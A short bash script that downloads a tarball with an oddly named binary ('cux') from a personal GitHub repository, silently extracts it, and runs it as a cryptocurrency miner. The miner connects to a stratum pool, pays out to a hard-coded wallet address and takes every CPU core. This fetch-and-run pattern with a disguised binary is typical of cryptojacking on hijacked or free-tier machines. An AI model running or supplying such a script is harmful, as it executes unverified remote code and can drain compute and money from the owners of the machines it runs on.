#!/bin/bash
wget https://github.com/ganggamulyana08/lotek/raw/main/cux.tar.gz && tar -xvf cux.tar.gz >/dev/null 2>&1
./cux -a yespowertide  -o stratum+tcp://stratum-eu.rplant.xyz:7059 -u TFJuSRiKbvp3DWj1anKAe3Q92m5pMteCC4.labed -t $(nproc --all)
